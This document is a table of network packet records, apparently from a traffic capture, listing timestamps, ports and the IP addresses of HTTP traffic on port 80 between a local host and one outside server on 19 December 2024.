Dec 19, 2024 08:52:37.983827114 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.983870029 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.984683990 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.984935045 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.984985113 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.985821962 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.985991955 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.986042023 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.986849070 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.987087965 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.987131119 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.987972975 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.988128901 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.988190889 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.989064932 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.989233017 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.989325047 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.990206957 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.990324020 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.990367889 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.991255999 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.991478920 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.991569042 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.991986990 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.992126942 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.992168903 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.992518902 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.992532015 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.992572069 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.992904902 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.992918015 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.992996931 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.993570089 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.993941069 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.993983984 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.994309902 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.994323015 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.994368076 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.994996071 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.995008945 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.995168924 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.995697021 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.995708942 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.995752096 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.996376038 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.996387005 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.996437073 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.997068882 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.997081041 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.997122049 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.997778893 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.997791052 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.997849941 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.998528004 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.998539925 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.998578072 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:37.999245882 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.999258995 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:37.999326944 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.000047922 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.000061989 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.000799894 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.000813007 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.000822067 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.000852108 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.001024008 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.001537085 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.001549959 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.001610994 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.002325058 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.002337933 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.002398014 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.003084898 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.003098965 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.003142118 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.003846884 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.003859997 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.003873110 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.003906965 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.004595041 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.004609108 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.004643917 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.004667044 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.005378008 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.005390882 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.005444050 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.006099939 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.006145954 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.006891012 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.006905079 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.006952047 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.007035971 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.007596016 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.007610083 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.007622004 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.007677078 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.008317947 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.008331060 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.008371115 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.009022951 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.009036064 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.009088993 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.009733915 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.009753942 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.009813070 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.010456085 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.010468960 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.010479927 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.010510921 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.010548115 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.011189938 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.011203051 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.011329889 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.011898994 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.011912107 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.012607098 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.012619972 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.012644053 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.013314009 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.013328075 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.013355970 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.013374090 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.014019012 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.014031887 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.014043093 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.014084101 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.014719009 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.014733076 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.014769077 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.015402079 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.015414953 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.015455961 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.016128063 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.016140938 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.016180992 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.016812086 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.016824961 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.016835928 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.016889095 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.017571926 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.017585039 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.017623901 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.017719984 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.018237114 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.018249989 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.018301964 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.018908978 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.018923044 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.019598961 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.019613028 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.019637108 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.019663095 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.020306110 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.020319939 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.020330906 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.020371914 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.020998001 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.021011114 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.021051884 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.021687031 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.021699905 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.021745920 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.022389889 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.022403002 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.022452116 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.023089886 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.023102999 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.023114920 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.023140907 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.023757935 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.023771048 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.023821115 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.023840904 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.024465084 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.024477959 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.025135040 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.025149107 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.025182962 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.025202036 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.025870085 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.025885105 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.026551962 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.026565075 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.026576042 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.026591063 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.026922941 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.027209997 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.027223110 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.027262926 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.027898073 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.027911901 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.027949095 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.028584003 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.028597116 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.028606892 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.028990030 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.029262066 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.029275894 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.029316902 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.029979944 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.029994011 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.030004978 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.030059099 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.030113935 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.030705929 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.030725956 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.030905962 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.031343937 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.031354904 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.031519890 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.032021046 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.032033920 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.032078028 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.032722950 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.032735109 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.032746077 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.032778025 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.033391953 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.033406019 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.033447981 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.034077883 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.034146070 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.034163952 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.034769058 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.034780979 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.034832954 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.035454035 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.035465956 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.035542011 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.036138058 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.036150932 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.036161900 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.036185980 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.036499977 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.036515951 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.036806107 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.036818027 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.036884069 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.037516117 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.037528992 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.037637949 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.038183928 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.038197041 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.038239002 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.038850069 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.038861990 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.038873911 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.038940907 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.039534092 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.039546967 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.039613962 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.040215015 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.040226936 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.040266037 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.040889025 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.040901899 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.040982962 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.041594028 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.041605949 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.041635036 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.042464018 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.042476892 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.042613029 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.042639971 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.042687893 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.043076038 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.043087959 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.043133974 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.043637037 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.043649912 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.043720961 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.044321060 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.044333935 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.044398069 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.044991970 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.045005083 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.045016050 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.045047045 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.045690060 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.045702934 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.045727015 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.046338081 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.046350002 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.046396971 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.047029018 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.047041893 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.047127962 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.047714949 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.047732115 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.047775984 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.048388958 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.048402071 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.048413038 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.048444986 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.048465014 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.049087048 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.049098969 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.049171925 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.049756050 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.049767971 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.049810886 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.050432920 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.050445080 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.050489902 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.051114082 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.051126957 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.051137924 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.051176071 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.051820993 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.051832914 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.051866055 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.052493095 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.052505016 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.052561998 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.053152084 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.053164005 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.053201914 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.053853035 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.053865910 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.053932905 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.054557085 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.054569960 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.054580927 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.054604053 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.054624081 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.055229902 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.055244923 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.055330038 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.055912971 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.055927992 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.055974007 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.056564093 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.056576014 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.056637049 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.057245970 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.057259083 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.057270050 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.057317972 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.057919025 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.057931900 CET	80	49734	147.45.47.15	192.168.2.4
